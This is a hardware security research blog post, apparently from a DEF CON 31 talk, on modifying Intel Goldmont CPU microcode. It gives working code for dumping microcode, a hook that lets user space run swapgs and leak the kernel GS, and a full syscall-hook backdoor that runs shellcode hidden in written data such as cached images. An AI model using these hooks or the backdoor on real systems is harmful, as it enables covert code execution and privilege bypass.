vectorize logo transparent

Hardware Security Research: Building a Backdoor Inside a CPU Core

By Vectorize

Table of Contents

Hello! In this exploit development and cybersecurity training blog, we will be exploring the depths of Intel SOC CPUs, conducting vulnerability research, and embedding a backdoor deep inside a CPU core by modifying the microcode that makes up the x86 instruction set. We will have a look at Intel’s microarchitecture for the Goldmont CPU series focusing on the Microcode Sequencer (MS).

Normally we think of assembly instructions as atomic operations handled by transistors and hardware, which is only partly true, as modern CISC CPUs translate "high-level" instructions to microcode instructions which we will refer to as macro and micro instructions, respectively, throughout this post.

This post is an in-depth continuation of the talk I gave at Def Con 31, and it’s worth watching before reading, but not required. Talk and slides can be found here: Talk and slides can be found here: Link

Prerequisites and Requirements

To reproduce any findings described throughout this blog post, one will need the following:

  1. A red unlocked Intel Goldmont CPU, preferably soldered to a dev board 🙂

  2. lib-micro

  3. build-essentials (gcc, make etc.)

  4. SPI flash programmer

  5. flashrom

Doing this research project, we used the UP Squared dev boards, which can be found here.

ONLY TESTED with the Intel® Pentium® N4200 CPU. To red unlock it, one can follow instructions from IntelTXE-PoC with some modifications to the rop-chain as we weren’t able to get the UP board to boot without. Changes can be found at https://github.com/zanderdk/lib-micro/blob/master/bin/exploit.py. We also provide a pre-build image which already comes with a exploit for the Intel Management Engine

To flash the board hookup an SPI Programmer as detailed by coreboot docs and flash the pre-build image using the following command:


sudo flashrom --programmer ch341a_spi -w <path_to_image>

To test if the CPU is in a red unlocked state, we can try to write to the hidden enable bit for microarchitectural instructions. Using the wrmsr (Write model specific register) command line util for linux: sudo wrmsr --all 0x1e6 0x200 if we read back the same value using sudo rdmsr 0x1e6 this means the CPU is red unlocked and all cores have enabled undocumented instructions for microcode debugging.

Debug Instructions

To access the microcode sequencer, we will need to write access to the control register bus (CRBUS), this we gain from unlocking the debug macro instructions as described in this article by Mark Ermlov et. al. In lib-micro source, we find the following implementations for CRBUS read and writes:


__attribute__((always_inline))

u_result_t static inline udbgrd(uint64_t type, uint64_t addr) {

    lmfence();

    u_result_t res;

    asm volatile(

        ".byte 0x0F, 0x0E\n\t" // udbg instruction for reading

        : "=d" (res.value)

        , "=b" (res.status)

        : "a" (addr)

        , "c" (type)

    );

    lmfence();

    return res;

}

__attribute__((always_inline))

u_result_t static inline udbgwr(uint64_t type, uint64_t addr, uint64_t value) {

    uint32_t value_low = (uint32_t)(value & 0xFFFFFFFF);

    uint32_t value_high = (uint32_t)(value >> 32);

    u_result_t res;

    lmfence();

    asm volatile(

        ".byte 0x0F, 0x0F\n\t" // udbg instruction for writing

        : "=d" (res.value)

        , "=b" (res.status)

        : "a" (addr)

        , "c" (type)

        , "d" (value_low)

        , "b" (value_high)

    );

    lmfence();

    return res;

}

#define SIMPLERD(name, type) \

__attribute__((always_inline)) \

u64 static inline name(u64 addr) { \

    return (u64)udbgrd(type, addr).value; \

}

SIMPLERD(crbus_read, 0x00) // reading crbus

SIMPLEWR(crbus_write, 0x00) // writing crbus

Above, we define C macro for read and write micro architecture debug instructions. The rcx registers specify read/write mode where 0x00 means control register bus, rax is the address to which we will make a read or write. in [edx:ebx] contains data for the instructions.

The crbus connects internal component’s of the CPU where one of these is the Local Direct Access test (LDAT) from which we can program and inspect various IP units on of which is the Microcode Sequencer, which has the port index 0x6a0. Below is the implementation from lib-micro for writing to LDAT and MS:


void ldat_array_write(u64 pdat_reg, u64 array_sel, u64 bank_sel, u64 dword_idx, u64 fast_addr, u64 val) {

    u64 prev = crbus_read(0x692); //disable CPU frontend

    crbus_write(0x692, prev | 1);

    crbus_write(pdat_reg + 1, 0x30000 | ((dword_idx & 0xf) << 12) | ((array_sel & 0xf) << 8) | (bank_sel & 0xf));

    crbus_write(pdat_reg, 0x000000 | (fast_addr & 0xffff));

    crbus_write(pdat_reg + 4, val & 0xffffffff);

    crbus_write(pdat_reg + 5, (val >> 32) & 0xffff);

    crbus_write(pdat_reg + 1, 0);

    crbus_write(0x692, prev); //enable CPU frontend

}

void ms_array_write(u64 array_sel, u64 bank_sel, u64 dword_idx, u64 fast_addr, u64 val) {

    ldat_array_write(0x6a0 /* MS */, array_sel, bank_sel, dword_idx, fast_addr, val);

}

u64 ms_array_read(u64 array_sel, u64 bank_sel, u64 dword_idx, u64 fast_addr) {

    return ldat_array_read(0x6a0 /* MS */, array_sel, bank_sel, dword_idx, fast_addr); // ldat_array_read is implemented using microcode and explained later

}

LDAT is segmented into arrays, banks, words and addresses, but we will only be focusing on array and addresses as bank and word indices for MS is always zero. The microcode ROM is stored in array 0 and 1, ram in 2 and 4 for a deeper understanding of these arrays, we refer to the lib-micro documentation.

Now we are at a point where we can start writing to the microcode RAM area:


void patch_ucode(u64 addr, ucode_t ucode_patch[], int n) { //write microcode patches

// format: uop0, uop1, uop2, seqword

// uop3 is fixed to a nop and cannot be overridden

    for (int i = 0; i < n; i++) {

// patch ucode

        ms_rw_code_write(ucode_addr_to_patch_addr(addr + i*4)+0, CRC_UOP(ucode_patch[i].uop0)); //write to array 4

        ms_rw_code_write(ucode_addr_to_patch_addr(addr + i*4)+1, CRC_UOP(ucode_patch[i].uop1));

        ms_rw_code_write(ucode_addr_to_patch_addr(addr + i*4)+2, CRC_UOP(ucode_patch[i].uop2));

// patch seqword

        ms_rw_seq_write(ucode_addr_to_patch_seqword_addr(addr) + i, CRC_SEQ(ucode_patch[i].seqw)); //write to array 2 (RW SEQ)

    }

}

The code above will write to MS RAM, which starts at address 0x7c00 and ends at 0x8000 for a detailed overview of look here.

Dumping Microcode

Let’s write some microcode! The first thing we are going to write will be for dumping the microcode ROM area. In the code below, we use the macro language from lib-micro to assembly microcode.

Microcode is stored in triads which is sets of 3 micro instructions under the control of a sequence word. The sequence word controls execution flow, but for this example, we will only be using NOP_SEQWORD, which will do nothing and continue execution in the following triad.

Microcode supports encoding immediate values, registers, addresses and macro aliases, but for now we will only be using regs and imms.

We annotate a Destination register with a D, operand registers R and immediate values with I.

Example encoding:

  • MOVE_DSZ64_DR – moving from register to register and can be read as "move with data size of 64 bits with destination and operand register"

  • ZEROEXT_DSZ32_DI setting a register to an immediate value and can be read as "Zero extend with data size of 32 bits with destination and immediate value"

In microcode, we have access to more than the normal x86 registers, we have 16 temporary registers, which is internal to the CPU core and hidden from the macro world named tmp0-tmp15.

For more details on how to micro-operations are encode, we again refer to the lib-micro documentation

Micro code for implementing reading from the LDAT:


unsigned long addr = 0x7de0; //location in microcode RAM

ucode_t ucode_patch[] = { // Microcode implementation for reading from LDAT

    { // 0x7de0

    // grab arguments from macro world registers (RDI, RSI, RDX)

        MOVE_DSZ64_DR(TMP0, RDI), //move port id to TMP0

        MOVE_DSZ64_DR(TMP1, RSI), //array index

        MOVE_DSZ64_DR(TMP2, RDX), //address to read

        NOP_SEQWORD

    },

    { // 0x7de4

        ZEROEXT_DSZ32_DI(TMP10, 0x0),

        ADD_DSZ32_DRI(TMP11, TMP0, 0x1),

        ADD_DSZ32_DRI(TMP12, TMP0, 0x2),

        NOP_SEQWORD

    },

    { // 0x7de8

    // pause frontend

        MOVEFROMCREG_DSZ64_DI(TMP9, 0x38c),

        MOVETOCREG_DSZ64_RI(TMP10, 0x38c),

        MOVEFROMCREG_DSZ64_DR(TMP13, TMP11),

        NOP_SEQWORD

    },

    { // 0x7dec

        MOVETOCREG_DSZ64_RR(TMP1, TMP11),

        MOVETOCREG_DSZ64_RR(TMP2, TMP0),

        MOVEFROMCREG_DSZ64_DR(RAX, TMP12), //read resulting value from CRBUS

        NOP_SEQWORD

    },

    { // 0x7df0

        MOVETOCREG_DSZ64_RR(TMP10, TMP11),

        MOVETOCREG_DSZ64_RI(TMP9, 0x38c),

        NOP,

        END_SEQWORD

    },

};

The micro code above will do the same calculation as the ldat_array_write implemented in C but where the write is switched for a read to rax register. We can now include this code into our C project and start dumping the micro code rom:


u64 ldat_array_read(u64 pdat_reg, u64 array_sel, u64 bank_sel, u64 dword_idx, u64 fast_addr) {

#include "ucode/ldat_read.h" //code from above

    patch_ucode(addr, ucode_patch, ARRAY_SZ(ucode_patch)); //insert the micrcode patch at 0x7de0

    u64 array_bank_sel = 0x10000 | ((dword_idx & 0xf) << 12) | ((array_sel & 0xf) << 8) | (bank_sel & 0xf);

    u64 res = ucode_invoke_3(addr, pdat_reg, array_bank_sel, 0xc00000 | fast_addr);

    return res; // will contain the value of rax returned by microcode

}

Wait, how did we get a ucode_invoke_3 ?

Another feature of the undocumented udbgwr instructions is a microcode jump, if we place the value 0xd8 into rcx we will treat rax as address into the microcode ROM/RAM address space and directly jump to that address. Using that information, we can construct a C functions for invoking arbitrary microcode addresses as following below:


__attribute__((always_inline))

u64 static inline ucode_invoke_3(u64 addr, u64 arg1, u64 arg2, u64 arg3) {

    u64 rax = addr, rcx = 0xD8; //select ucode jump mode

    lmfence(); //memory fences for safety

    asm volatile(

        ".byte 0x0F, 0x0F\n\t" //magic udbgwr instruction

        : "+a" (rax)

        , "+c" (rcx)

        , "+rdi" (arg1)

        , "+rsi" (arg2)

        , "+rdx" (arg3)

        :

        : "rbx", "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15"

    );

    lmfence();

    return rax;

}

Now let’s dump it! All we have to do is read from the LDAT in a loop and print the value, and we can dump the microcode ROM and start analyzing:


void ms_array_dump(u64 array_sel, u64 fast_addr, u64 size) {

    for (; fast_addr < size; fast_addr+=4) { // loop & read

        u64 val0 = ldat_array_read(0x6a0, array_sel, 0, 0, fast_addr);

        u64 val1 = ldat_array_read(0x6a0, array_sel, 0, 0, fast_addr+1);

        u64 val2 = ldat_array_read(0x6a0, array_sel, 0, 0, fast_addr+2);

        u64 val3 = ldat_array_read(0x6a0, array_sel, 0, 0, fast_addr+3);

        printf("%04lx: %012lx %012lx %012lx %012lx\n", fast_addr, val0, val1, val2, val3); //print result to stdout

    }

}

//implement wrapper for all the 5 MS arrays as described in lib-micro docs.

void ms_ro_code_dump(void){

    puts("array 00:");

    ms_array_dump(0, 0, 0x7e00);

}

void ms_ro_seqw_dump(void){

    puts("array 01:");

    ms_array_dump(1, 0, 0x8000);

}

void ms_rw_seqw_dump(void){

    puts("array 02:");

    ms_array_dump(2, 0, 0x80);

}

void ms_match_n_patch_dump(void){

    puts("array 03:");

    ms_array_dump(3, 0, 0x20);

}

void ms_rw_code_dump(void){

    puts("array 04:");

    ms_array_dump(4, 0, 0x200);

}

Woo, we now got a dump of the micro code ROM and using the uCodeDisasm, We can disassemble micro instructions into readable opcode.

Hooking Instructions

With the micro ROM dumped, we can disassemble the micro code, now let’s have a look at how we can change behaviour and modify macro instructions. Another feature in micro code is array free, it consists of 32 entries of match & patch registers. Through trial and error, we found arrived at the following semantics for these registers.

Tux, the Linux mascot

The registers are divided into three bit fields. Where src and dst is two micro code addresses shifted right one bit, and p being a present bit. In ucode_glm.txt We find the dissembled ROM extracted using the above methods, let’s try and program a match & patch register to make a simple change. In lables.txt, We find all xlat’s (macro instructions entry points in MS ROM) we identified so far one of which is swapgs_xlat. This instruction is swapgs and it swaps the kernel and user-space segment register gs :


swapgs_xlat:

U0870: 006302033200 tmp3:= READURAM(0x0002, 64) // read saved GS

U0871: 0c4b20372000 tmp2:= RDSEGFLD(GS, BASE) // read current GS

U0872: 100a02000200 TESTUSTATE(SYS, UST_USER_MODE)

01a711c0 ? SEQW GOTO generate_#GP

// bail if not in privileged mode, by jumping to Ucode generating

// General protection fault.

U0874: 0c7b2d000033 WRSEGFLD(tmp3, GS, BASE)

// write new effective GS

U0875: 204302000232 LFNCEMARK-> WRITEURAM(tmp2, 0x0002, 64)

// Save old GS

04808e72 SEQW GOTO lfence_wait_uend0

// Jump to Ucode for lfence instruction which also uend's the current

// macro instruction. We need this memory barrier as GS is a memory

// segmentation register.

In the micro code above, we also see a branch made from the sequence word. Encoded in the first sequence word is a branch to the Ucode address U2711 == generate_#GP Because the uip (micro instruction pointer) encoded in the sequence word is a TESTUSTATE the branch after executing U872 becomes conditional on the test result.

Lets program the following value to a match & patch (0x0874 >> 1) << 16 | (0x0872 >> 1) | 1 == 0x43A0439 This will put at hook on 0x872 and make it jump to 0x874. We can again achieve this using the xlat with the following C expression:


hook_match_and_patch(0, 0x872 /* src address */, 0x874 /* dst address */);

Wooo, we changed the swapgs from a privileged instruction to a user space instruction by skipping the check, and we can verify this from running:


uint rax = 0x0;

asm volatile(

    "swapgs\n\t"

    "mov ax, gs"

    "swapgs\n\t"

    : "=a" (rax)

)

This will leak the kernel gs from user-space. We do the swap twice to not crash the kernel, by leaving kernel gs as it was. But if we put this in a big loop, we will start observing 0x0 after running for some time…

Hidden side-effect

Through a lot of digging and failed hooks, we discoed hidden side effects placed by Intel in the port IO macro instructions. This instruction will verify the micro code state and reset it if changes are detected. This is also why CustomProcessingUnit fails to persist micro code changes after booting linux and will only persist while still in a UEFI shell. When we tried porting the repository to userspace, at first, nothing seemed to work. Then we realized that we were actually successful in applying a microcode update. It was just very quickly being overwritten with the original update again. After some experimenting, we found that this overwrite would not happen if we just kept the processor busy, and as soon as we created a big enough sleep call or exited the process, it would get overwritten. We suspected that the overwrite was being done from within the microcode

itself, and used this knowledge to trace the entire microcode ROM to create a list of candidate microcode addresses. We eventually traced it all the way down to the exact instruction that led our hook to be overwritten. We created a hook to dump the current value of RIP (macro instruction pointer) and found that the microcode in question was being called from the function acpi_idle_do_entry in the Linux Kernel. Specifically, the in al, dx instruction triggered the code path. From the Linux Kernel source code, the function is explained as ”acpi idle do entry – enter idle state using the appropriate method”. This matches our previous observations that the overwrites only happened when we let the processor idle. We then created a hook to completely skip that branch of the IN instruction, and our microcode was no longer being overwritten. The following code snippet will make all micro code changes persist:


void do_fix_IN_patch() {

// Patch U58ba to U017a

    hook_match_and_patch(0x1f, 0x58ba, 0x017a);

}

We will not include the full trace of in as it is huge, but it can be found in ROM dump above.


// much microcode above

U58b4: 000100032cf2 tmp2:= OR_DSZ32(tmp2, tmp3)

U58b5: 00621d034200 tmp4:= MOVEFROMCREG_DSZ64(0x01d)

U58b6: 002501034234 tmp4:= SHR_DSZ32(tmp4, 0x00000001)

U58b8: 000400032d32 tmp2:= AND_DSZ32(tmp2, tmp4)

U58b9: 000700031c72 tmp1:= NOTAND_DSZ32(tmp2, tmp1)

U58ba: 01507a040231 LFNCEMARK-> UJMPCC_DIRECT_NOTTAKEN_CONDZ(tmp1, U017a)

// force the branch above using match & patch register ^^^^^^^^^^^^^^^^^^^^^

U58bc: 00010003c000 tmp12:= OR_DSZ32(0x00000000)

U58bd: 00ed04030230 tmp0:= ROR_DSZ8(tmp0, 0x00000004)

U58be: 00c001030230 tmp0:= ADD_DSZ8(tmp0, 0x00000001)

U58c0: 002408034230 tmp4:= SHL_DSZ32(tmp0, 0x00000008)

U58c1: 00040f030c08 tmp0:= AND_DSZ32(0x0000000f, tmp0)

U58c2: 000502032c08 tmp2:= SUB_DSZ32(0x00000002, tmp0)

U58c4: 0352d06002b2 LFNCEWTMRK-> UJMPCC_DIRECT_NOTTAKEN_CONDLE(tmp2, U58d0)

U58c5: 2d0bc8031008 tmp1:= PORTIN_DSZ32_ASZ16_SC1(0x00c8)

U58c6: 002510031231 tmp1:= SHR_DSZ32(tmp1, 0x00000010)

// much microcode below

Writing a Backdoor

Now for the fun part, let’s hide a backdoor in the instruction set!

There are a lot of instructions in the x86 instruction set. Many of them are implemented in microcode, which lets us hook them. Utilizing the fact that all browsers will cache files like images that are downloaded from websites, we then hook the syscall instruction when a write syscall is being run. If the data contains our magic value, we change the syscall to mprotect, making the data RWX, and then execute the data as shellcode.

Syscall

Before diving deep into the backdoor, let’s have a quick look at the implementation of the syscall instruction from microcode:


syscall_xlat:

U02e0: 000b01833200 tmp3:= UPDATEUSTATE(!0x04)

U02e1: 006384034200 LFNCEMARK-> tmp4:= READURAM(0x0084, 64) // IA32_LSTAR?

U02e2: 006382031200 tmp1:= READURAM(0x0082, 64) // IA32_LSTAR?

048bb296 SEQW SAVEUIP1 U02e4

SEQW GOTO U0bb2

U02e4: 006520030230 tmp0:= SHR_DSZ64(tmp0, 0x00000020)

U02e5: 008703030c08 tmp0:= NOTAND_DSZ16(0x00000003, tmp0)

U02e6: 004804821008 rcx:= ZEROEXT_DSZ64(IMM_MACRO_ALIAS_RIP)

// Store the address of the next user-space instruction into rcx. ^^^^

0181d280 SEQW GOTO U01d2

From the intel manual read this as the first sentence about syscal:

SYSCALL invokes an OS system-call handler at privilege level 0. It does so by loading RIP from the IA32_LSTAR MSR (after saving the address of the instruction following SYSCALL into RCX). (The WRMSR instruction ensures that the IA32_LSTAR MSR always contain a canonical address.)

This is exactly what we also read from the micro-code implementation, keep this in mind as it becomes important later.

Implementation

Below is the full implementation of the backdoor used in our demo at Defcon 31 we will try and explain step by step using comments. In our slide a pseudo code version which is more readable, can be found as well.


unsigned long addr = 0x7d30; // Ucode RAM address where we place ucode

unsigned long hook_address = 0x02e0; // syscall_xlat (syscall entry point)

ucode_t ucode_patch[] = {

    { // 0x0

        XOR_DSZ64_DRI(TMP5, RAX, 0x1), // check RAX for SYS_WRITE

        UJMPCC_DIRECT_NOTTAKEN_CONDZ_RI(TMP5, addr+0x6),

        XOR_DSZ64_DRI(TMP5, RAX, 0x12),

        // check RAX for pwrite64 a variant of SYS_WRITE

        NOP_SEQWORD

    },

    { // 0x4

        UJMPCC_DIRECT_NOTTAKEN_CONDZ_RI(TMP5, addr+0x6),

        UJMP_I(addr+0x2c),

        UJMPCC_DIRECT_NOTTAKEN_CONDZ_RI(RSI, addr+0x2c),

        // check RSI is not 0x0 and if not assume to be a valid pointer

        NOP_SEQWORD

    },

    { // 0x8

        ZEROEXT_DSZ64_DI(TMP6, 0xd00d),

        CONCAT_DSZ16_DRI(TMP6, TMP6, 0xf00d), //put 0xd00dfood into TMP6

        ADD_DSZ64_DRI(TMP4, RSI, 0xd8), // tmp4 = rsi + 0xd8

        NOP_SEQWORD

    },

    { // 0xc

        LDZX_DSZ64_ASZ32_SC1_DR(TMP5, TMP4, 0x18), //read magic value from memory

        XOR_DSZ64_DRR(TMP5, TMP5, TMP6), //check if we found magic in image data

        UJMPCC_DIRECT_NOTTAKEN_CONDNZ_RI(TMP5, addr+0x2c), // bail out if not

        NOP_SEQWORD

    },

    { // 0x10

        // Save regs

        // We now save the current register state to memory/image data.

        // This is done so we can recover the execution state from memory when

        // we finaly achive macro level shell code.

        ZEROEXT_DSZ64_DM(TMP5, IMM_MACRO_ALIAS_RIP),

        SUB_DSZ64_DIR(TMP5, 0x2, TMP5),

        STAD_DSZ64_ASZ32_SC1_RRI(TMP5, TMP4, 0x0, SEG_DS),

        NOP_SEQWORD

    },

    { // 0x14

        STAD_DSZ64_ASZ32_SC1_RRI(RAX, TMP4, 0x8, SEG_DS),

        STAD_DSZ64_ASZ32_SC1_RRI(RDI, TMP4, 0x10, SEG_DS),

        STAD_DSZ64_ASZ32_SC1_RRI(RSI, TMP4, 0x18, SEG_DS),

        NOP_SEQWORD

    },

    { // 0x18

        STAD_DSZ64_ASZ32_SC1_RRI(RDX, TMP4, 0x20, SEG_DS),

        NOP,

        // Overwrite regs

        // now we modify the register state to prepare a mprotect syscall.

        ADD_DSZ64_DRI(TMP5, RSI, 0x100), // jmp rsi+0x100

        // ^^^^^^^^^^^^^^^^^^^^^^^ IMPORTANT ^^^^^^^^^^^^^^^^^^^^^^

        // We calculate an address into the image data where we have put

        // shellcode and save it to TMP5.

        NOP_SEQWORD

    },

    { // 0x1c

        // Now we setup arguments for syscall to do an mprotect instead of

        // intended write syscall:

        // int mprotect(void *addr, size_t len, int prot);

        SUB_DSZ64_DIR(RDI, 0x1000, 0),

        AND_DSZ64_DRR(RDI, RDI, RSI), // rdi = rsi & ~0xfff, first argument

        // We set addr to rsi & 0x2000 for page alignment.

        // This is the area we want to be RWX

        ZEROEXT_DSZ64_DI(RSI, 0x2000), // rsi = 0x2000, size

        NOP_SEQWORD

    },

    { // 0x20

        ZEROEXT_DSZ64_DI(RDX, 0x7), // rdx = PROT_READ | PROT_WRITE | PROT_EXEC == 0x7

        // above we set the new memory protection flags

        ZEROEXT_DSZ64_DI(RAX, 0xa), // rax = mprotect

        // finally we change the syscall from a SYS_WRITE to a SYS_MPROTECT

        UJMP_I(addr+0x2d),

        NOP_SEQWORD

    },

    { // 0x24

        UJMPCC_DIRECT_NOTTAKEN_CONDNZ_RI(TMP5, addr+0x26),

        UJMP_I(addr+0x28),

        MOVE_DSZ64_DR(RCX, TMP5),

        // ^^^^^^^^^^^^^^^^^^^^^^^ IMPORTANT ^^^^^^^^^^^^^^^^^^^^^^

        // This is the final trick!

        // Change the return address of the syscall instruction stored in RCX.

        // This will make the kernel "think" it should return to our shellcode

        // after handling an MPROTECT! of the same area.

        SEQ_GOTO2(addr+0x29) | SEQ_NOSYNC

    },

    { // 0x28

        ZEROEXT_DSZ64_DM(RCX, IMM_MACRO_ALIAS_RIP),

        SHR_DSZ64_DRI(TMP0, TMP0, 0x20),

        NOTAND_DSZ16_DIR(TMP0, 0x3, TMP0),

        SEQ_GOTO2(0x1d2) | SEQ_NOSYNC

    },

    { // 0x2c Execute first few instructions in normal syscall

        XOR_DSZ64_DRR(TMP5, TMP5, TMP5),

        UPDATEUSTATE_NOT_I(0x1) | DST_ENCODE(TMP3),

        READURAM_DI(TMP4, 0x84),

        SEQ_GOTO2(0x2e2) | SEQ_NOSYNC

    }

};

Now with the ìn side effect gone and the above microcode patch, we can finally place the backdoor using the following C code:


void do_syscall_patch() {

#include "ucode/syscall.h" // code from above

    patch_ucode(addr, ucode_patch, ARRAY_SZ(ucode_patch));

    hook_match_and_patch(0x12, hook_address, addr);

    hook_match_and_patch(0x13, 0x02e4, addr+0x24);

}

We place use 0x12 as our first match & patch register, as the once below is already allocated for actual bug fixes by Intel, and Chrome will nuke the CPU after a couple of seconds if we don’t keep these patches alive. We are still not sure of the root cause but have nailed it down to patch 0x8 being the critical one.

The entire code can be found in our repo, and demo in the presentation from Defcon 31.

Reversing Macro Instructions

Now with a backdoor in place, what’s left to do?

Well, we have seen Chrome crash due to bugs in the CPU, what if we could develop exploits for the CPU itself and with what goal?

If we somehow could gain control of the uip, it could be possible to redirect microcode control flow to the debug instructions and, as such do a red unlock from the software.

Like we have shown in with syscall, we used the documentation as well as pseudo code from the Intel manual as reference implementation while reversing. Another very neat trick is watching changes in the control register bus. As mentioned, the control register bus contains information shared between logic units.

In the control register bus, we find these two registers CORE_CR_CUR_RIP , CORE_CR_CUR_UIP at 0x67 and 0x68 respectively. An interesting observation about the UIP pointer is that it will update after executing the instruction. This fact can be abused to back trace entire macro instructions.

Let’s say we wanna find the xlat for swapgs, we can put a hook on generate_#GP and run MOVEFROMCREG_DSZ64_D(RAX, CORE_CR_CUR_UIP) as the first instruction after the hook. Now rax will contain the address before jumping to generate_#GP which will leak the address of the last executed privileged macro instruction executed from user-space we control. So if we run swapgs after placing this hook we will leak its address. In labels.txt we have documented all xlat’s we have found so far.

By Vectorize

Share Article

Check out next article

Vulnerability Research: Behind Great Walls